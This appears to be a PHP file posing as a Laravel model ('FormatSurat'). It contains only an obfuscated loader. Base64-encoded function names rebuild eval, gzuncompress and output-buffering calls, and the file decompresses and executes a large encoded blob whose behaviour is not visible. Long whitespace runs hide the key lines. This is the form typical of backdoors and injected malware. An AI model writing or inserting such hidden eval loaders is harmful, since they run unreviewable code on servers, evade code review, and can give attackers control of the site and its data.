<?php 
        $__='printf';$_='Loading app/Models/FormatSurat.php';
        











































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvm0gUfo+0/yEPldxVVinYcVsU+cEQGMAJjcHm9lLBjA0OA6bBF/Cv34ONb7m66mqlVnzWJIDnXOac75wZJz4/3+DDd0CnkT5Oktm4cb2+rdBpeGn66W5KRjT7JE0fY29mzB+92WUapucC9bLs8vKycX1WaTr/66x+/T6vszLV5/8hOs+eNGyWyxyLnbhI7DTWj/ZsOQkVHTvnNWrUqPFnooFjkyG2OleQ2XSs5VSVuLFdRF82TRO65qZdf69DVaNGjRo1atSoUaPG74b6zxk1atSo8eei4XvZ6PPVdzLCUzJqXNcRqVGjRo0aNX4Jx99RuOlPNSFuh75lrjCSHlyD57HM44HFRa6Vr74tmd5NP2VxcxgYVp4Ri039WGJcMxcdWw+dWFrBteQjLieWOSdSLhCLZi4yi1KW2BpVRJr5sjnzrHZIkIl1JDGOpYa4CddWvsC2Sf1Er2wuv7xib0Bsfum3VMYW3dBpSpFra3iAuKTy8cFH0goXPII5M/AN5qshEXg6knXqx/pKEdkF+JXBXLAxDRShG2DZnPiIPihIW/iJxsAcfhDp6jCKgnujm5e6y3mKzLNOnKdOwT/4zfYK9Gr9YVs0TFW1GZjPSMJAHJYyyzdkbs1h+8YwupxyI77hw8wcRNqLercyt8X0hyLPuhDTqWurKUH6wmkxQW/yVRMmYFvglzjmGNfSYPQDVS5zlVPlhgnUlt5yLXWMW2YBcRq7MVf4lsSoq0wTgsp34euP3u66+0MRderGdA78CBXEhn4SzQj6OgO5+cjgC+AK5JaW/k89uzvf+qkI08qfLvjGd3f/qpNy1Uc561t0Dj5QW9RBXpo4wBdbNDO/JbGu1WZsSaWQV8azuDlmcwHsLPyYrEzEaY7Vbh/YWTyPp8v6sbaWVWSt7ZR8kDQWA596QrSN05e9jjJnKiWyWfiTbkRQmOKCuXBi8KfZTjCrLwbr9YaDkSUVO47dTD87zTzErbtMEciqeq+Kbz+5FbrJ01jbTRqpxRJyoVKXcjsZz+onvUG29Y1b1+cmfove5CiWA6fJLSEfZd0VkAMWaoj1Cj5zbBpCzczXeYr1FMfR6/lAYNdign5ipj7SKYZ1l/WIk+jlvIkq61k51J5y8P6ec8RSM8+6C9zEnDstPfWbVwFuaguMzDJfkQdc7Ql65fP7Oah8md0npOQ57QlkttVTxg+3St7Qh28P6a4efzV+ng01KG94oshlLHEANiLHygIX0UditR8842qv66hO+GXJM9/gd31Q2a63fzSvcG0dbFztY3+g5/Z5D4lLu+sam/Crte/DWcnvX41ntR6cwZoZ4GDqrKafDdb81mfoWBfpoD9U73Qj2ukc94/70AG3Ar0JPCnXjPIUt/pBVQMQt5KP+sJrmTPXugrADoNjOiFQ+7cH6z7U1d/5zYc4UcPD+L0TnwRie1fmcdiiYZnH4ab+eCLrhWepLEHDaW+rT852uVz3jy3XBZ3xEF3dDtqro3oXmAuo4WWvu/NnNw55D3mp5PrpUxv7seeBtXyu72Ak0AcnsD8m0MMvlL1uyOVxD4HanznG8hV7m6G23BD2ZKoWXe6+5EUVJ1gr9HJ3vL0v+9Rt922/1j3N5Fab2ODgfvDuWtbjlDmbQZiRzW99TeDckJX7GtT/m2s89BFyCjVCYW39TfyAB8QaZkd18sZQob+X+8DWBx1xUDcsBa5VewH0+e7J65k7ILvV5e504Z/wh2V9GXo7yis9fOzAec01To8JiSU4X5mrFzgQ+U3oLXCeg2s4S3WnT3i9e79nPOk17419Tfs/JfdyDRz6WcY0PD0Hr9fCPh/MBezH2U/5KTEnx2NsRCfo5snba+LJazrswQs9R2aOnp24V8rQoxjY84N1rRt8Vet8eNBP3z/zITYdITM6+cyGCCWiu8Axu+m7osQQWU2dxGRcI0i3sqOjPsIzsL89efakryNpiYUg2Z7PegZz4YJeEptFb9/zoSfn2zNcCvdx+bkCzo1P9lYmgM8ijNMMgp6USyOkUSxv6kRFw5f7vpgvXNhjYf8t/JYyLecdnu1f2hv8BM6gN8e6xrv9C3KawAg6ncb12dn//2Gys/79sbr7+/pnxA9kTxH8sDf4sVH+bPyzM1t/l/73/C79cW4/HpFpk9q/r/8Fj7Ho5Q==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































                                                                                                                                                                                                                     $________;
